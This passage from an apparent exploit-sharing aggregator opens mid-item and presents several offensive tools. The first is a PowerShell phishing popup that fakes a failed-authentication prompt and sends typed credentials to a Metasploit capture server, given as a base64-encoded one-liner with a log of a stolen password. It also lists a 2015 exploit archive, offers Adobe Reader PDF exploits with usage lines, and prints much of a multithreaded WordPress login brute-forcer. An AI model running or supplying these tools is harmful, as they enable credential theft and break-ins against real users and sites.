    # the server answers 401 and the client presumably retries with the Basic header.
    $result = $wc.downloadstring('https://172.16.102.163');

    Lets break down the code line by line:

    $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserName,[Environment]::UserDomainName);

    This tells Windows to prompt for credentials, with the title of "Failed Authentication", no info in the comment (so it uses default), and include the username and domain in the box to add authenticity. That's where all the magic is, everything else is just gravy.

    [system.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};

    Tells powershell not to verify SSL certificates (allows us to use self signed certs in the HTTPS transaction later).

    $wc = new-object net.webclient;

    $wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");

    Creates a new webclient object and sets its user agent to ‘wget’

    $wc.Proxy = [system.Net.WebRequest]::DefaultWebProxy;

    $wc.Proxy.Credentials = [system.Net.CredentialCache]::DefaultNetworkCredentials;

    Tells powershell to use whatever proxy the current user uses with whatever credentials they have cached. If one or both are unnecessary it just ignores these settings.

    $wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');

    Tells powershell that the HTTP-Basic credentials to use are the ones typed in the popup box recently by the user.

    $result = $wc.downloadstring('https://172.16.102.163');

    And finally the request to HTTP-Basic capture module in metasploit, but you could have anything you want capture these creds.

    cat power.txt | iconv --to-code UTF-16LE | base64

    JABjAHIAZQBkACAAPQAgACQAaABvAHMAdAAuAHUAaQAuAHAAcgBvAG0AcAB0AGYAbwByAGMAcgBlAGQAZQBuAHQAaQBhAGwAKAAnAEYAYQBpAGwAZQBkACAAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuACcALAAnACcALABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBVAHMAZQByAEQAbwBtAGEAaQBuAE4AYQBtAGUAIAArACAAIgBcACIAIAArACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVQBzAGUAcgBOAGEAbQBlACwAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVQBzAGUAcgBEAG8AbQBhAGkAbgBOAGEAbQBlACkAOwAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKACQAdwBjACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsACgAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAVQBzAGUAcgAtAEEAZwBlAG4AdAAiACwAIgBXAGcAZQB0AC8AMQAuADkAKwBjAHYAcwAtAHMAdABhAGIAbABlACAAKABSAGUAZAAgAEgAYQB0ACAAbQBvAGQAaQBmAGkAZQBkACkAIgApADsACgAkAHcAYwAuAFAAcgBvAHgAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsACgAkAHcAYwAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbABzADsACgAkAHcAYwAuAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAG4AZQB0AHcAbwByAGsAYwByAGUAZABlAG4AdABpAGEAbAAoACQAYwByAGUAZAAuAHUAcwBlAHIAbgBhAG0AZQAsACAAJABjAHIAZQBkAC4AZwBlAHQAbgBlAHQAdwBvAHIAawBjAHIAZQBkAGUAbgB0AGkAYQBsACgAKQAuAHAAYQBzAHMAdwBvAHIAZAAsACAAJwAnACkAOwAKACQAcgBlAHMAdQBsAHQAIAA9ACAAJAB3AGMALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADcAMgAuADEANgAuADEAMAAyAC4AMQA2ADMAJwApADsACgA=

    Then execute

    powershell -ep bypass -enc <the encoded text from above>

    and you get this:

    Image should be here:

    2014-09-03-powershellpopup.png

    root@wpad:~/metasploit-framework# ./msfconsole -Lq

    msf > use auxiliary/server/capture/http_basic

    msf auxiliary(http_basic) > show options

    Module options (auxiliary/server/capture/http_basic):

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    REALM Secure Site yes The authentication realm you'd like to present.

    RedirectURL no The page to redirect users to after they enter basic auth creds

    SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0

    SRVPORT 80 yes The local port to listen on.

    SSL false no Negotiate SSL for incoming connections

    SSLCert no Path to a custom SSL certificate (default is randomly generated)

    SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

    URIPATH no The URI to use for this exploit (default is random)

    msf auxiliary(http_basic) > set SSL true

    SSL => true

    msf auxiliary(http_basic) > set SRVPORT 443

    SRVPORT => 443

    msf auxiliary(http_basic) > set URIPATH /

    URIPATH => /

    msf auxiliary(http_basic) > run

    [*] Auxiliary module execution completed

    msf auxiliary(http_basic) >

    [*] Listening on 0.0.0.0:443...

    [*] Using URL: https://0.0.0.0:443/

    [*] Local IP: https://172.16.102.163:443/

    [*] Server started.

    [*] 172.16.102.140 http_basic - Sending 401 to client 172.16.102.140

    [+] 172.16.102.140 - Credential collected: "SITTINGDUCK\user:ASDqwe123" => /

    Source: room362

  7. This archive contains 174 exploits that were added to Packet Storm in April, 2015.

    1504-exploits/
    1504-exploits/wpwoocommerceaa-shelldisclose.txt
    1504-exploits/emailmarkerter-xss.txt
    1504-exploits/projectsend561-xsrf.txt
    1504-exploits/nodesstudio-sqlxssdiscose.txt
    1504-exploits/wpsam-disclose.txt
    1504-exploits/VL-1314.txt
    1504-exploits/VL-1227.txt
    1504-exploits/airties-exec.txt
    1504-exploits/oracledotcom-xss.txt
    1504-exploits/prolink-xsrf.txt
    1504-exploits/PRL-2015-05.tgz
    1504-exploits/wpphpec-upload.txt
    1504-exploits/AS-WFTP0328.txt
    1504-exploits/hippocms-crlf.txt
    1504-exploits/bloofoxcms050-xss.txt
    1504-exploits/wpbusinessintelligence-sql.txt
    1504-exploits/wpthecartpress-xsslfi.txt
    1504-exploits/netgearwnr2000v4-xssexec.txt
    1504-exploits/SpiritSploit.py.txt
    1504-exploits/ms15-034.txt
    1504-exploits/mediasuitecms-disclose.txt
    1504-exploits/proftpd135-filecopy.txt
    1504-exploits/6kbbs80-xss.txt
    1504-exploits/cve-2014-7822_poc.c
    1504-exploits/proftpd135-exec.txt
    1504-exploits/wpallinone-sql.txt
    1504-exploits/multi_ncc_ping_exec.rb.txt
    1504-exploits/phplist3010-insecure.txt
    1504-exploits/6kbbs-sql.txt
    1504-exploits/0xb16b00b5.tgz
    1504-exploits/adbbackup-traversal.txt
    1504-exploits/netcatcms-traversal.txt
    1504-exploits/wp42-xss.txt
    1504-exploits/fedoraabrt-racecondition.txt
    1504-exploits/oraclehyperionsmart-dos.txt
    1504-exploits/VL-1311.txt
    1504-exploits/wpfusionengage-disclose.txt
    1504-exploits/VL-1322.txt
    1504-exploits/wpnexforms-sql.txt
    1504-exploits/landesk-rfixsrf.txt
    1504-exploits/VL-1445.txt
    1504-exploits/wp_wpshop_ecommerce_file_upload.rb.txt
    1504-exploits/wp_inboundio_marketing_file_upload.rb.txt
    1504-exploits/honeywell-traversal.txt
    1504-exploits/VL-1455.txt
    1504-exploits/adobe_flash_casi32_int_overflow.rb.txt
    1504-exploits/proverbswebcal212-xss.txt
    1504-exploits/wtknetwork-sql.txt
    1504-exploits/kemploadmaster-execxsrfxssdos.txt
    1504-exploits/wpduplicator-sqlxsrf.txt
    1504-exploits/VL-1215.txt
    1504-exploits/wp_worktheflow_upload.rb.txt
    1504-exploits/rootpipe.rb.txt
    1504-exploits/6kbbs80-xsrf.txt
    1504-exploits/fmp3cr2628-overflow.txt
    1504-exploits/wpyoastgs-xss.txt
    1504-exploits/ninja-racecondition.txt
    1504-exploits/opointmedia-openredirect.txt
    1504-exploits/wp_nmediawebsite_file_upload.rb.txt
    1504-exploits/texttospeech-xss.txt
    1504-exploits/wpnexforms3-sql.txt
    1504-exploits/nasagov-xss.txt
    1504-exploits/sambaopenldap-xss.txt
    1504-exploits/wpcontentslide-xssxsrf.txt
    1504-exploits/wpsam-upload.txt
    1504-exploits/freepbx-xss.txt
    1504-exploits/pligg202-xss.txt
    1504-exploits/ZSL-2015-5240.txt
    1504-exploits/netcatcms-inject.txt
    1504-exploits/phpsfp-sql.txt
    1504-exploits/ZSL-2015-5238.txt
    1504-exploits/wptunelibrary154-sql.txt
    1504-exploits/testdisk-overflow.txt
    1504-exploits/websid-xss.txt
    1504-exploits/wpshareaholic-xss.txt
    1504-exploits/cpx_proftp.py.txt
    1504-exploits/huaweiseqanalyst-xss.txt
    1504-exploits/jaws111-xsrf.txt
    1504-exploits/wpmon-disclose.txt
    1504-exploits/untangle-xssdisclose.txt
    1504-exploits/samsungipolis-exec.txt
    1504-exploits/orangehrm321411-sqlxss.txt
    1504-exploits/jboss_seam_upload_exec.rb.txt
    1504-exploits/netsol_web_mail.pdf
    1504-exploits/SA-20150409-0.txt
    1504-exploits/VL-1444.txt
    1504-exploits/edruttmsdpim-traversalfile.txt
    1504-exploits/zenworks-exectraversal.txt
    1504-exploits/hotexbilling-xss.txt
    1504-exploits/osxrootpipe-escalate.txt
    1504-exploits/miniupnpd-overflow.txt
    1504-exploits/wprevolutionslider-shell.txt
    1504-exploits/ossolution-sql.txt
    1504-exploits/VL-1228.txt
    1504-exploits/wpdesignfolio-shell.txt
    1504-exploits/wpcommunityevents135-sql.txt
    1504-exploits/thehunter.txt
    1504-exploits/CORE-2015-0008.txt
    1504-exploits/solarwinds_fsm_userlogin.rb.txt
    1504-exploits/phptraffica23-xss.txt
    1504-exploits/pimcorecms305-xsrf.txt
    1504-exploits/wolfcms082-shell.txt
    1504-exploits/otrs31x-xss.txt
    1504-exploits/php-typeconfusion.txt
    1504-exploits/avsarsoftmatbaa-shellxss.txt
    1504-exploits/wooframework451-xss.txt
    1504-exploits/joomlasimplephotogallery-shell.txt
    1504-exploits/ubuntuusbcreator-escalate.txt
    1504-exploits/wp_creativecontactform_file_upload.rb.txt
    1504-exploits/weebly-hijack.txt
    1504-exploits/wpultimatenewspaper-xss.txt
    1504-exploits/wpvvci-shell.txt
    1504-exploits/PRL-2015-04.tgz
    1504-exploits/idm6-dllhijack.txt
    1504-exploits/Mac-OS-X_Fat-DoS.c
    1504-exploits/openletters-inject.txt
    1504-exploits/encapsflashgallery-dos.txt
    1504-exploits/VL-1438.txt
    1504-exploits/adobe_flash_copy_pixels_to_byte_array.rb.txt
    1504-exploits/flatpress10-xss.txt
    1504-exploits/SA-20150410-0.txt
    1504-exploits/synology-xss.txt
    1504-exploits/VL-1453.txt
    1504-exploits/wp_slideshowgallery_upload.rb.txt
    1504-exploits/edruttmsdprv-xss.txt
    1504-exploits/edruttmsdp-redirect.txt
    1504-exploits/VL-1474.txt
    1504-exploits/wpsam-sql.txt
    1504-exploits/ZSL-2015-5242.txt
    1504-exploits/VL-1452.txt
    1504-exploits/javacom-xss.txt
    1504-exploits/barracuda_5x_reports_postauth_root_exploit.rb.txt
    1504-exploits/safari-crossdomain.txt
    1504-exploits/SGMA15-002.txt
    1504-exploits/VL-1359.txt
    1504-exploits/comsenzsupesitecms70-xss.txt
    1504-exploits/eceprojects-xss.txt
    1504-exploits/apachespark-exec.txt
    1504-exploits/ceragon_fibeair_known_privkey.rb.txt
    1504-exploits/wpcitizenspace-xss.txt
    1504-exploits/VL-1447.txt
    1504-exploits/edruttmsdp-xss.txt
    1504-exploits/ceragonfibeair-disclose.txt
    1504-exploits/zyxel-dos.txt
    1504-exploits/huaweiseqanalyst-xxe.txt
    1504-exploits/wpqaengine-escalate.txt
    1504-exploits/apportabrt-exec.txt
    1504-exploits/qlik-redirect.txt
    1504-exploits/wpvideogallery28-sql.txt
    1504-exploits/pyscripter-dllhijack.txt
    1504-exploits/bluedragon-traversal.txt
    1504-exploits/meela-xss.txt
    1504-exploits/unipdf12-overflow.txt
    1504-exploits/wpworktheflow252-shell.txt
    1504-exploits/VL-1446.txt
    1504-exploits/soapfault-typeconfusion.txt
    1504-exploits/wpnmediawcf-shell.txt
    1504-exploits/mefa-xss.txt
    1504-exploits/goautodial-execsqlupload.txt
    1504-exploits/ZSL-2015-5239.txt
    1504-exploits/ZSL-2015-5241.txt
    1504-exploits/wpseopack180-shell.txt
    1504-exploits/wpstatistics912-xss.txt
    1504-exploits/wpvvp-shell.txt
    1504-exploits/xoops2571-xss.txt
    1504-exploits/androidbackupagent-exec.txt
    1504-exploits/apportabrt-issues.txt
    1504-exploits/freebsdkey-disclose.txt
    1504-exploits/legend_rce.py.txt
    1504-exploits/wpwdippu-upload.txt
    1504-exploits/wp_reflexgallery_file_upload.rb.txt
    1504-exploits/libarchive-dos.tgz
    1504-exploits/log2space62-xss.txt
    1504-exploits/wpajaxstorelocator-sql.txt
    tar: 1504-exploits/wpajaxstorelocator-sql.txt: time stamp 2015-05-16 05:33:33 is 1279061.268089756 s in the future

    Download

  8. Here are Adobe Reader exploits for CVE-2011-2462 and two different versions of CVE-2010-2883; all of the code is Python.

    usage for cve2011-4262 : createExploitPDF.py http://example.com/bin/bad.exe

    usage for CVE-2010-2883 : [input_file.exe] [output_file.pdf]

    adobe.rar — RGhost — file sharing

    List of files

    File name Size Compressed Ratio

    adobe/createExploitPDF.py 32.2 KB 5.93 KB 18.425%

    adobe/PDF2883v2.py 414 KB 128 KB 30.835%

    adobe/PDF2883v3.py 665 KB 202 KB 30.306%

    adobe

    Source: opensc

  9. This is a python script that performs brute forcing against WordPress installs using a wordlist.

    WordPress Brute Force by Claudio Viviani

    Inspired by xSecurity's WordPress Brute Muliththreading

    Tested on Wordpress 3.x and 4.x

    Disclaimer:

    This tool is intended for educational purposes only and the author

    can not be held liable for any kind of damages done whatsoever to your machine,

    or damages caused by some other,creative application of this exploit.

    In any case you disagree with the above statement,stop here.

    Requirements:

    1. python's httplib2 lib

    Installation:

    pip install httplib2

    Features:

    1. Multithreading
    2. xml-rpc brute force mode
    3. http and https protocols support
    4. Random User Agent

    CHANGELOG:

    2015-04-12 v2.0

    1. Add new feature xml-rpc brute force mode
    2. Fix minor bugs

    2015-04-11 v1.1

    1. optparse (Deprecated since version 2.7) replaced by argparse
    2. Fix connection bugs

    Download:

    #!/usr/bin/env python

    #

    # WordPress Brute Force by Claudio Viviani

    #

    # Inspired by xSecurity's WordPress Brute Muliththreading

    #

    # Tested on Wordpress 3.x and 4.x

    #

    # Disclaimer:

    #

    # This tool is intended for educational purposes only and the author

    # can not be held liable for any kind of damages done whatsoever to your machine,

    # or damages caused by some other,creative application of this exploit.

    # In any case you disagree with the above statement,stop here.

    #

    # Requirements:

    #

    # 1) python's httplib2 lib

    # Installation: pip install httplib2

    #

    # Features:

    #

    # 1) Multithreading

    # 2) xml-rpc brute force mode

    # 3) http and https protocols support

    # 4) Random User Agent

    #

    # CHANGELOG:

    #

    # 2015-04-12 v2.0

    # 1) Add new feature xml-rpc brute force mode

    # 2) Fix minor bugs

    #

    # 2015-04-11 v1.1

    # 1) optparse (Deprecated since version 2.7) replaced by argparse

    # 2) Fix connection bugs

    #

    #

    import urllib, httplib, httplib2

    import socket, sys, os, os.path, argparse, random

    from threading import Thread

    from time import sleep

    banner = """

    ___ ___ __

    | Y .-----.----.--| .-----.----.-----.-----.-----.

    |. | | _ | _| _ | _ | _| -__|__ --|__ --|

    |. / \ |_____|__| |_____| __|__| |_____|_____|_____|

    |: | |__|

    |::.|:. |

    `--- ---'

    _______ __ _______

    | _ .----.--.--| |_.-----| _ .-----.----.----.-----.

    |. 1 | _| | | _| -__|. 1___| _ | _| __| -__|

    |. _ |__| |_____|____|_____|. __) |_____|__| |____|_____|

    |: 1 \ |: |

    |::.. . / |::.|

    `-------' `---'

    W0rdBRUTEpr3ss v2.0

    Written by:

    Claudio Viviani

    http://www.homelab.it

    info@homelab.it

    homelabit@protonmail.ch

    http://ffhd.homelab.it (Free Fuzzy Hashes Database)

    https://www.facebook.com/homelabit

    https://twitter.com/homelabit

    https://plus.google.com/+HomelabIt1/

    https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

    """

    def randomAgentGen():

    userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',

    'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

    'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',

    'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',

    'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

    'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',

    'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',

    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0',

    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

    'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

    'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

    'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',

    'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',

    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',

    'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

    'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',

    'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

    'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',

    'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',

    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',

    'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',

    'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46',

    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

    'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',

    'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',

    'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',

    'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',

    'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',

    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',

    'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',

    'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',

    'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',

    'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',

    'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',

    'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0',

    'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',

    'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',

    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',

    'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',

    'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',

    'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',

    'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',

    'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

    'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0',

    'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0',

    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36',

    'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',

    'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',

    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',

    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',

    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']

    UA = random.choice(userAgent)

    return UA

    def urlCMS(url,brutemode):

    if url[:8] != "https://" and url[:7] != "http://":

    print('\n[X] You must insert http:// or https:// procotol')

    os._exit(1)

    # Page login

    if brutemode == "std":

    url = url+'/wp-login.php'

    else:

    url = url+'/xmlrpc.php'

    return url

    def bodyCMS(username,pwd,brutemode):

    if brutemode == "std":

    body = { 'log':username,

    'pwd':pwd,

    'wp-submit':'Login',

    'testcookie':'1' }

    else:

    body = """<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>wp.getUsersBlogs</methodName>

    <params><param><value>%s</value></param><param><value>%s</value></param></params></methodCall>""" % (username, pwd)

    return body

    def headersCMS(UA,lenbody,brutemode):

    if brutemode == "std":

    headers = { 'User-Agent': UA,

    'Content-type': 'application/x-www-form-urlencoded',

    'Cookie': 'wordpress_test_cookie=WP+Cookie+check' }

    else:

    headers = { 'User-Agent': UA,

    'Content-type': 'text/xml',

    'Content-Length': "%d" % len(lenbody)}

    return headers

    def responseCMS(response):

    if response['set-cookie'].split(" ")[-1] == "httponly":

    return "1"

    def connection(url,user,password,UA,timeout,brutemode):

    username = user

    pwd = password

    http = httplib2.Http(timeout=timeout, disable_ssl_certificate_validation=True)

    # HTTP POST Data

    body = bodyCMS(username,pwd,brutemode)

    # Headers

    headers = headersCMS(UA,body,brutemode)

    try:

    if brutemode == "std":

    response, content = http.request(url, 'POST', headers=headers, body=urllib.urlencode(body))

    if str(response.status)[0] == "4" or str(response.status)[0] == "5":

    print('[X] HTTP error, code: '+str(response.status))

    os._exit(1)

    if responseCMS(response) == "1":

    print('\n')

    print('[!] Password FOUND!!!')

    print('')

    print('[!] Username: '+user+' Password: '+password)

    os._exit(0)

    checkCon = "OK"

    return checkCon

    else:

    response, content = http.request(url, 'POST', headers=headers, body=body)

